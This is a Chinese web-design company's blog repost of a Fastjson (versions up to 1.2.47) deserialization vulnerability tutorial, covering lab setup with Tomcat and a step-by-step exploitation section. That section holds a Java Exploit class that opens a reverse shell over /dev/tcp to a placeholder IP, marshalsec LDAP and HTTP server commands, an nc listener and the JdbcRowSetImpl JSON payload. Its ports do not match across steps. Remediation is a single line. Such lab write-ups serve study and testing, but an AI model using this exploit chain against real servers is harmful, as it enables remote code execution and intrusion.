如何实现Fastjson漏洞分析

本篇文章给大家分享的是有关如何实现Fastjson漏洞分析,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

创新互联主打移动网站、网站建设、网站制作、网站改版、网络推广、网站维护、国际域名空间、等互联网信息服务,为各行业提供服务。在技术实力的保障下,我们为客户承诺稳定,放心的服务,根据网站的内容与功能再决定采用什么样的设计。最后,要实现符合网站需求的内容、功能与设计,我们还会规划稳定安全的技术方案做保障。

0x01简介

fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。

 FastJson特点如下:

(1)能够支持将java bean序列化成JSON字符串,也能够将JSON字符串反序列化成Java bean。

(2)顾名思义,FastJson操作JSON的速度是非常快的。

(3)无其他包的依赖。

(4)使用比较方便。如何实现Fastjson漏洞分析

0x02漏洞介绍

Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。

0x03影响版本

Fastjson <= 1.2.47

0x04环境搭建

虚拟机:centos7

所需环境:jdk8

JDK8下载地址:https://pan.baidu.com/s/1nuxQJkYwkY2UOaPEIshQig 提取码:lc0i

Tomcat

Tomcat下载地址:https://mirrors.tuna.tsinghua.edu.cn/apache/tomcat/tomcat-9/v9.0.36/bin/

Fastjson1.2.47

Fastjson1.2.47下载地址:链接:https://pan.baidu.com/s/1D0gDc3NGXlHQ2Yamy4zHtQ  提取码:ps2p

本地搭建Tomcat

1、安装jdk8并配置环境变量

首先在usr目录下创建一个java的目录

mkdir /usr/java如何实现Fastjson漏洞分析

2、将下载好的jdk8的安装包放在usr/java目录下,使用tar解压,mv重命名

tar zxvf jdk-8u141-linux-x64.tar

mv jdk-8u141-linux-x64.tar/  jdk8   //重命名为jdk8如何实现Fastjson漏洞分析

3、配置系统环境变量,使用vim编辑profile文件

vim /etc/profile  在最后一行加上一下代码

export JAVA_HOME=/usr/java/jdk8

export CLASSPATH=.:$JAVA_HOME/jre/lib/rt.jar:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar

export PATH=$PATH:$JAVA_HOME/bin

如何实现Fastjson漏洞分析

保存后使用java -version 查看是否配置成功如何实现Fastjson漏洞分析

Java环境安装好,再来安装Tomcat

把Tomcat传上Centos7上,使用tar zxvf apache-tomcat-9.0.36.tar.gz解压如何实现Fastjson漏洞分析

使用命令重命名tomcat

mv apache-tomcat-9.0.27 tomcat9  //重命名为tomcat9如何实现Fastjson漏洞分析

授予tomcat9这个文件夹为777权限

chmod 777 tomcat9/如何实现Fastjson漏洞分析

把tomcat的加入到环境变量

vim /etc/profile

export CATALINA_HOME=/tomcat9  //存放tomcat的目录如何实现Fastjson漏洞分析

应用环境变量

source  /etc/profile

启动tomcat,进入tomcat9下的bin目录

cd tomcat9/bin

sudo ./catalina.sh start   //启动tomcat

如何实现Fastjson漏洞分析

浏览器访问http://ip:8080 查看如何实现Fastjson漏洞分析

复制fastjson1.2.47到webapps文件夹下,解压,访问出现hello word环境即搭建成功如何实现Fastjson漏洞分析

0x05漏洞利用

1、编译生成Exploit.class

首先将以下代码保存为Exploit.java,反弹shell命令在代码内,可自行更改

import java.io.BufferedReader;

import java.io.InputStream;

import java.io.InputStreamReader;




public class Exploit{

    public Exploit() throws Exception {

        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/xx.xx.xx.xx/1888;cat <&5 | while read line; do $line 2>&5 >&5; done"});

        InputStream is = p.getInputStream();

        BufferedReader reader = new BufferedReader(new InputStreamReader(is));




        String line;

        while((line = reader.readLine()) != null) {

            System.out.println(line);

        }




        p.waitFor();

        is.close();

        reader.close();

        p.destroy();

    }




    public static void main(String[] args) throws Exception {

    }

}

然后编译Exploit.java,会生成一个Exploit.class文件

javac Exploit.java如何实现Fastjson漏洞分析

2.开启3个监听窗口

第一个使用python3开启一个临时服务,然后把编译好的Exploit.class文件放至web目录下,使浏览器访问会下载

python -m http.server 8000如何实现Fastjson漏洞分析

注:此步是为了接收LDAP服务重定向请求,需要在payload的目录下开启此web服务,这样才可以访问到payload文件

第二个服务器使用刚才下载的工具marshalsec开启LDAP服务监听:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.10.106:8000/#Exploit 6666如何实现Fastjson漏洞分析

注:使用marshalsec工具快捷的开启LDAP服务,借助LDAP服务将LDAP reference result 重定向到web服务器

第3个,开启nc监听设定的端口

Nc -lvnp 4444如何实现Fastjson漏洞分析

访问fastjson页面使用Burp抓包,构造数据包修改为POST请求,使用EXP

{

    "name":{

        "@type":"java.lang.Class",

        "val":"com.sun.rowset.JdbcRowSetImpl"

    },

    "x":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"ldap://ip:9999/Exploit",

        "autoCommit":true

    }




}

发送后可以看到nc监听窗口成功得到shell如何实现Fastjson漏洞分析

0x06修复方式

将Fastjson升级到最新版本

以上就是如何实现Fastjson漏洞分析,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注创新互联行业资讯频道。


网站标题:如何实现Fastjson漏洞分析
网页地址:http://pwwzsj.com/article/iesdoj.html